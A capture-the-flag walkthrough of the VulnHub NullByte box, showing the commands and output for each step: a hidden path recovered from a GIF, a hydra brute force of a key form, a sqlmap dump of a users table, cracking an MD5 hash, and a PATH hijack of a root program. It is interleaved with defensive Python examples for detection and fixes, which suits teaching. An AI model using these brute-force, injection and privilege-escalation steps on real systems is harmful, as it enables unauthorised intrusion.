VulnHub: NullByte Walkthrough

NullByte is another intentionally vulnerable box on VulnHub by lyon.
Enumeration
Starting enumeration with AutoRecon.
Nmap scan report for 192.168.50.152
Host is up, received arp-response (0.0022s latency).
Scanned at 2022-01-01 18:16:43 EST for 12s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
777/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5 (protocol 2.0)
46581/tcp open status syn-ack ttl 64 1 (RPC #100024)
SSH is running on the non-standard port 777. Starting with port 80.
The index page consists of a GIF with a message like the one in the article cover. There is nothing in the source code and no links to click.
Looking at the dirbusting results:
200 10l 28w 196c http://192.168.50.152/index.html
301 9l 28w 321c http://192.168.50.152/javascript
301 9l 28w 321c http://192.168.50.152/phpmyadmin
403 11l 32w 302c http://192.168.50.152/server-status
301 9l 28w 318c http://192.168.50.152/uploads
/index.html has the gif with message.
/javascript is forbidden.
/server-status is forbidden.
/phpmyadmin has the login form but default creds do not work.
/uploads reports that directory listing is not allowed.

So we are back where we started.
We tried gobuster on /uploads too, with different wordlists, but it did not turn up anything.
We had hit a dead end, but there had to be something to move forward with.
All we had was a GIF and a phpmyadmin login form which I could brute-force.
After some googling I came to know that a GIF can be passed to the strings command.
┌──(root💀kali)-[~]
└─# strings index.gif
GIF89a
P-): kzMb5nVYJw
cccIII@@@GGG444999```<<<
ooo>>>EEE
???^^^
HHH;;;
strings reveals a string, kzMb5nVYJw; trying /kzMb5nVYJw works.
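The string strings found sits in the GIF's comment extension, a block viewers skip, which is why it never shows on screen. The following example, added here and not part of the walkthrough, walks the GIF block structure to pull out comment extensions and any bytes appended after the trailer, and reproduces the default behaviour of strings(1) (runs of four or more printable ASCII bytes). The sample GIF is constructed inline so it runs offline; it is not the box's index.gif.

```python
import re
import struct

# Constructed sample: a minimal 1x1 GIF89a whose comment extension carries the
# same text the strings run above recovered. It is not the box's index.gif.
COMMENT = b"P-): kzMb5nVYJw"
SAMPLE_GIF = (
    b"GIF89a"
    + struct.pack("<HHBBB", 1, 1, 0x00, 0, 0)                   # logical screen descriptor, no global colour table
    + b"\x21\xFE" + bytes([len(COMMENT)]) + COMMENT + b"\x00"   # comment extension (label 0xFE), one sub-block
    + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)          # image descriptor, no local colour table
    + b"\x02" + b"\x02\x44\x01" + b"\x00"                        # LZW min code size + one opaque data sub-block
    + b"\x3B"                                                    # trailer
    + b"TRAILING DATA"                                           # bytes a viewer never reads
)

def _read_sub_blocks(data, pos):
    """Collect a chain of length-prefixed sub-blocks; return (payload, position after the 0 byte)."""
    chunks = []
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return b"".join(chunks), pos
        chunks.append(data[pos:pos + size])
        pos += size

def gif_metadata(data):
    """Walk the GIF block structure and report comments, image count and any data after the trailer."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    width, height, flags = struct.unpack_from("<HHB", data, 6)
    pos = 13
    if flags & 0x80:                                  # global colour table follows the descriptor
        pos += 3 * (2 ** ((flags & 0x07) + 1))
    comments, images = [], 0
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                             # trailer: anything after it is not image data
            return {"size": (width, height), "comments": comments,
                    "images": images, "trailing": data[pos + 1:]}
        if block == 0x21:                             # extension introducer
            label = data[pos + 1]
            payload, pos = _read_sub_blocks(data, pos + 2)
            if label == 0xFE:                         # comment extension
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:                           # image descriptor
            lflags = data[pos + 9]
            pos += 10
            if lflags & 0x80:                         # local colour table
                pos += 3 * (2 ** ((lflags & 0x07) + 1))
            pos += 1                                  # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)      # image data, not decoded here
            images += 1
        else:
            raise ValueError(f"unknown block 0x{block:02x} at offset {pos}")
    raise ValueError("truncated GIF: no trailer")

def ascii_strings(data, min_len=4):
    """What strings(1) does by default: runs of at least min_len printable ASCII bytes."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

if __name__ == "__main__":
    print(gif_metadata(SAMPLE_GIF))
    print(ascii_strings(SAMPLE_GIF))
```

Run against a real file with `gif_metadata(open("index.gif", "rb").read())`. The parser is the more precise check: strings also reports colour-table bytes that happen to be printable, while the comment block and the post-trailer slack are the two places where text can ride along unseen in a GIF that otherwise displays normally.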

We have a form with a single field. After some trial and error, we ran hydra to brute-force it with rockyou.txt, using the response text "invalid key" to recognise a wrong guess.
┌──(root💀kali)-[~]
└─# hydra 192.168.50.152 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-02 17:11:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://192.168.50.152:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4154.00 tries/min, 4154 tries in 00:01h, 14340244 to do in 57:33h, 16 active
[STATUS] 4278.67 tries/min, 12836 tries in 00:03h, 14331562 to do in 55:50h, 16 active
[80][http-post-form] host: 192.168.50.152 login: ignore password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-02 17:17:42
elite is the key.
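A run like the hydra one above leaves a very recognisable trace in the web server's access log: thousands of POSTs to the same path from one client, all answered with 200 because the form reports a wrong key in the page body rather than with a status code. The detector below is an added example, not part of the walkthrough, that parses Apache combined-format lines and flags any client whose POST rate to the form exceeds a threshold inside a sliding window. The log lines are constructed inline (the user agent string is only a stand-in); the path and timestamps mirror the walkthrough.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format; the timestamp is parsed with %z so the offset is kept.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """One access_log line -> dict, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
        "ua": m["ua"],
    }

def detect_form_bruteforce(lines, path="/kzMb5nVYJw/index.php", window_s=60, threshold=20):
    """Flag clients that POST to `path` at least `threshold` times inside any `window_s` seconds.

    Status codes carry no signal here: a wrong key is answered with 200 and the
    text "invalid key", so the request rate per client is what we measure.
    """
    by_ip = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"] == path:
            by_ip[e["ip"]].append(e)
    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        start, peak = 0, 0
        for end, e in enumerate(events):          # sliding window over the sorted timestamps
            while (e["ts"] - events[start]["ts"]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"ip": ip, "peak_in_window": peak, "total": len(events),
                           "first": events[0]["ts"], "last": events[-1]["ts"],
                           "agents": sorted({e["ua"] for e in events})})
    return alerts

def make_sample_log():
    """Constructed access_log lines (not taken from the box): one client hammering
    the key form at a few requests per second, one client browsing normally."""
    tz = timezone(timedelta(hours=-5))
    base = datetime(2022, 1, 2, 17, 11, 39, tzinfo=tz)
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i // 3)).strftime(fmt)
        lines.append(f'192.168.50.1 - - [{ts}] "POST /kzMb5nVYJw/index.php HTTP/1.0" 200 196 "-" "Mozilla/5.0 (Hydra)"')
    ts = base.strftime(fmt)
    lines.append(f'192.168.50.7 - - [{ts}] "GET /index.html HTTP/1.1" 200 196 "-" "Mozilla/5.0"')
    lines.append(f'192.168.50.7 - - [{ts}] "POST /kzMb5nVYJw/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    for alert in detect_form_bruteforce(make_sample_log()):
        print(alert)
```

Feed it a real file with `detect_form_bruteforce(open("/var/log/apache2/access.log").readlines())`. The threshold of 20 POSTs per minute is far below the ~4,000 tries per minute hydra reported above, so a single run trips it within the first second; on the server side the same measurement is what a rate limit or fail2ban jail on this path would act on.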
We get another form asking for a username. Just pressing enter gives away all the data, so it is vulnerable to SQL injection.
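The behaviour described above (an empty search returning every row, and sqlmap later dumping the table through the same parameter) is what string-built SQL looks like from the outside. The pair of functions below is an added example, not the box's PHP: an in-memory SQLite stand-in for the seth.users table, the vulnerable pattern beside the parameterised fix. The parameter name usrtosearch comes from the sqlmap output; that the original query uses LIKE is an assumption made to reproduce the empty-search behaviour.

```python
import sqlite3

def setup_db():
    """In-memory stand-in for the box's seth.users table (constructed rows, hash value redacted)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, pass TEXT, user TEXT, position TEXT)")
    conn.executemany("INSERT INTO users (pass, user, position) VALUES (?, ?, ?)",
                     [("<hash redacted>", "ramses", ""), ("--not allowed--", "isis", "employee")])
    return conn

def search_vulnerable(conn, usrtosearch):
    """The pattern the form exhibits: the request parameter is pasted into the SQL text.

    An empty parameter yields LIKE '%%' (every row), and a quote in the
    parameter ends the string literal and lets the rest run as SQL, which is
    the hole sqlmap used to enumerate databases and dump the users table.
    """
    sql = f"SELECT id, user, position FROM users WHERE user LIKE '%{usrtosearch}%'"
    return conn.execute(sql).fetchall()

def search_fixed(conn, usrtosearch):
    """Bound parameter: the input is data, never SQL, and an empty search returns nothing."""
    term = usrtosearch.strip()
    if not term:
        return []
    return conn.execute("SELECT id, user, position FROM users WHERE user LIKE ?",
                        (f"%{term}%",)).fetchall()

if __name__ == "__main__":
    conn = setup_db()
    print("empty search, vulnerable:", search_vulnerable(conn, ""))
    print("empty search, fixed:     ", search_fixed(conn, ""))
    print("normal search, fixed:    ", search_fixed(conn, "isis"))
```

The fixed version still passes the user's `%` and `_` through as LIKE wildcards; if that matters, escape them or switch to an equality match. What it can no longer do is change the shape of the query.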


Fire up Burp, intercept the GET request, save it to a file and pass the file to sqlmap.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.10#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:44:14 /2022-01-02/
[17:44:14] [INFO] parsing HTTP request from 'getReq.txt'
[17:44:16] [WARNING] provided value for parameter 'usrtosearch' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:44:16] [INFO] testing connection to the target URL
--snip--
[17:44:46] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
seth is the only user-generated database.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt -D seth --tables
Database: seth
[1 table]
+-------+
| users |
+-------+
There's only one table in seth.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt -D seth -T users --dump-all
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
We find a password hash for user ramses.
We use hashes.com to identify the hash type. It is a base64-encoded string; once decoded we get an MD5 hash, which can be cracked with crackstation.net.
The password is omega.
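Why the stored value fell so quickly: base64 is an encoding, not protection, and the MD5 underneath it is unsalted, so a precomputed table answers it instantly. The snippet below is an added example, not code from the box: it undoes the wrapper and classifies what is inside (the value is the one dumped above), shows how the original scheme must have verified a login, and beside it the replacement a defender would deploy, a per-user random salt with scrypt from the standard library. The scrypt parameters are a reasonable interactive-login choice, not values from the page.

```python
import base64
import hashlib
import hmac
import os

# The value dumped from seth.users for ramses (from the walkthrough).
STORED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

def decode_stored(value):
    """Undo the base64 wrapper (padding restored) and say what the inner value looks like."""
    padded = value + "=" * (-len(value) % 4)
    inner = base64.b64decode(padded, validate=True).decode("ascii")
    if len(inner) == 32 and all(c in "0123456789abcdef" for c in inner):
        return "md5-hex", inner
    return "unknown", inner

def legacy_matches(password, stored):
    """How the original scheme must verify: unsalted MD5, so a lookup table cracks it."""
    kind, digest = decode_stored(stored)
    return kind == "md5-hex" and hmac.compare_digest(
        hashlib.md5(password.encode()).hexdigest(), digest)

def hash_password(password, salt=None):
    """Replacement: per-user random salt plus a memory-hard KDF (scrypt, standard library)."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return "scrypt$%s$%s" % (base64.b64encode(salt).decode(), base64.b64encode(key).decode())

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, salt_b64, key_b64 = stored.split("$")
    if algo != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return hmac.compare_digest(key, base64.b64decode(key_b64))

if __name__ == "__main__":
    print(decode_stored(STORED))
    print("legacy check for 'omega':", legacy_matches("omega", STORED))
    h = hash_password("omega")
    print(h)
    print(verify_password("omega", h), verify_password("elite", h))
```

Two hashes of the same password now differ because the salt differs, so a table built for one user is useless for the next, and each guess costs a deliberately expensive scrypt call instead of one MD5.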
Initial Foothold
We SSH into NullByte as ramses.
┌──(root💀kali)-[/home/kali/Desktop]
└─# ssh ramses@192.168.50.152 -p 777
The authenticity of host '[192.168.50.152]:777 ([192.168.50.152]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.50.152]:777' (ECDSA) to the list of known hosts.
ramses@192.168.50.152's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
Privilege Escalation
A little more enumeration.
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:~$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
No sudo permissions, but .bash_history is readable.
Ramses ran a procwatch binary in /var/www/backup.
It is a lot of gibberish when read, but when executed it runs the ps and sh commands.
We can make another executable named ps with /bin/sh in it and add its location to PATH.
ramses@NullByte:/var/www/backup$ echo /bin/sh > ps
ramses@NullByte:/var/www/backup$ chmod +x ps
ramses@NullByte:/var/www/backup$ cat ps
/bin/sh
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:${PATH}
ramses@NullByte:/var/www/backup$ echo $PATH
/var/www/backup:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
This way, when procwatch runs ps, the system searches PATH, finds our ps in the backup folder first, and executes that instead.
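The root cause is that a privileged program (procwatch ends up giving a root shell, so it presumably runs with elevated privileges) invokes ps by bare name through a shell and inherits the caller's PATH. The example below is added here and is not the box's code: it reproduces the lookup difference against a constructed writable directory standing in for /var/www/backup, audits a PATH string for entries a non-root user could plant a binary in, and shows how the helper should be launched instead (absolute path, fixed PATH, no shell). SAFE_PATH is a conventional choice, not taken from the page.

```python
import os
import shutil
import subprocess
import tempfile

SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"   # what a privileged program should use, not the caller's PATH

def resolve(cmd, path):
    """First executable named cmd along a PATH string, in the order a shell would search it."""
    for d in path.split(os.pathsep):
        candidate = os.path.join(d or ".", cmd)      # an empty entry means the current directory
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def risky_path_entries(path):
    """PATH entries that let a non-root user plant a binary: relative, empty, or writable by us."""
    risky = []
    for d in path.split(os.pathsep):
        if d == "" or not os.path.isabs(d):
            risky.append(d or "<empty: current directory>")
        elif os.path.isdir(d) and os.access(d, os.W_OK):
            risky.append(d)
    return risky

def run_fixed(cmd, *args):
    """Launch a helper the way procwatch should have: absolute path, clean environment, no shell."""
    exe = shutil.which(cmd, path=SAFE_PATH)
    if exe is None:
        raise FileNotFoundError(cmd)
    return subprocess.run([exe, *args], env={"PATH": SAFE_PATH},
                          capture_output=True, text=True, check=False)

def demo():
    """Reproduce the lookup with a constructed writable directory standing in for /var/www/backup."""
    with tempfile.TemporaryDirectory() as backup:
        fake = os.path.join(backup, "ps")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho fake ps\n")        # constructed stand-in for the page's ps script
        os.chmod(fake, 0o755)
        hijacked = backup + os.pathsep + SAFE_PATH     # the shape of the PATH the walkthrough exports
        return {
            "backup": backup,
            "with_user_path": resolve("ps", hijacked),   # the planted file wins
            "with_safe_path": resolve("ps", SAFE_PATH),  # the real ps, or None if absent
            "risky_entries": risky_path_entries(hijacked),
        }

if __name__ == "__main__":
    print(demo())
    print(risky_path_entries(os.environ.get("PATH", "")))
    print(run_fixed("ps", "-o", "pid,comm").stdout.splitlines()[0])
```

`risky_path_entries(os.environ["PATH"])` is a quick audit for any account that runs setuid helpers; the same logic applied to the PATH seen inside procwatch would have flagged the backup directory. Note that the kernel strips LD_PRELOAD and friends for setuid programs but leaves PATH alone, so a program that shells out has to sanitise it itself.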
Execute procwatch.
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
Voila! We are root.
Get the root flag.
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
[key block body omitted]
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
And there goes our root flag.
Thanks for reading.